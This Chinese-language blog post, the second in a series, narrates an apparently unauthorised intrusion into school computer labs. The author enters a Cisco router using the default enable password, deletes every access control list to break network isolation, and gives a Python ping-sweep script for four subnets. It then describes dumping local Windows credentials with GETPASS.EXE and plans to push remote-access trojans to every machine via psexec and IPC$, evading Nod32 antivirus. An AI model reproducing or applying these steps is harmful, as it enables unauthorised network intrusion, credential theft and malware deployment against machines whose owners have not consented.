记一次突破cisco网段限制跨机房使用python批量入侵(2)

接着第一篇继续写。第一篇篇幅太大,我把第一篇部分内容复制过来。红字为修改部分。


5.执行enable,进入特权模式,发现需要输入密码。默认cisco,成功进入特权模式。执行 show privilege 发现当前权限15 。

6.执行 show access-list 查看访问表。

        XXXXX#show access-list

        Extended IP access list 100

            deny ip 192.168.3.0 0.0.0.255 192.168.4.0 0.0.0.255

            deny ip 192.168.3.0 0.0.0.255 192.168.5.0 0.0.0.255

            deny ip 192.168.3.0 0.0.0.255 192.168.6.0 0.0.0.255

            permit ip any any (25306 matches)

        Extended IP access list 101

            deny ip 192.168.4.0 0.0.0.255 192.168.3.0 0.0.0.255

            deny ip 192.168.4.0 0.0.0.255 192.168.5.0 0.0.0.255

            deny ip 192.168.4.0 0.0.0.255 192.168.6.0 0.0.0.255

            permit ip any any (19092 matches)

        Extended IP access list 102

            deny ip 192.168.5.0 0.0.0.255 192.168.3.0 0.0.0.255

            deny ip 192.168.5.0 0.0.0.255 192.168.4.0 0.0.0.255

            deny ip 192.168.5.0 0.0.0.255 192.168.6.0 0.0.0.255

            permit ip any any (32410 matches)

        Extended IP access list 103

            deny ip 192.168.6.0 0.0.0.255 192.168.3.0 0.0.0.255

            deny ip 192.168.6.0 0.0.0.255 192.168.4.0 0.0.0.255

            deny ip 192.168.6.0 0.0.0.255 192.168.5.0 0.0.0.255

            permit ip any any (269568593 matches)

当时有四个机房,表也有四个,表的序号为IP的C段加97(192.168.3.1 ---- 100)

7.执行config t ,进入配置模式。停用所有ACL

        no access-list 100

        no access-list 101

        no access-list 102

        no access-list 103

8.执行exit ,退出config。执行show access-list ,发现为空。

9.回到cmd,ping下隔壁机房的教师机192.168.4.254,发现ping通,说明已经解除网段限制。

10.写python脚本批量列出4个机房的存活IP,尝试由于4个C段,尝试四线程。(其实效率没想象的那么高。)

python代码

import os
import threading

def ping(i):
	for k in range(1,255,1):
		ret=os.system("ping 192.168."+str(i)+"."+str(k)+" -n 1 -w 1")
		if ret==0:
			fileWriteObj.write("192.168."+str(i)+"."+str(k)+"\n")



threads=[]
t1 = threading.Thread(target=ping,args=("3",))
threads.append(t1)
t2 = threading.Thread(target=ping,args=("4",))
threads.append(t2)
t3 = threading.Thread(target=ping,args=("5",))
threads.append(t3)
t4 = threading.Thread(target=ping,args=("6",))
threads.append(t4)

if __name__ == '__main__':

	fileWriteObj = open("E:\\list.txt", 'w') #存活主机列表保存位置
	for t in threads:
		t.start()
	t.join()
	if (t1.isAlive() == False and t2.isAlive()== False and t3.isAlive()==False and t4.isAlive() == False):
		fileWriteObj.close()

11.由于机房系统为WindowsXP,猜测老师把各个机器的用户名密码设置相同并默认开启了IPC服务。

12.用GETPASS.EXE获取本机的用户名密码:XXXX:XXXXXXXXX(文字马赛克)

13.利用psexec的c参数和python脚本批量种植远控木马。但每台机器都有Nod32杀软,需要对木马做简单做免杀。(待续)


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:漏洞 浏览:2148 评论:0
留言列表
发表评论
来宾的头像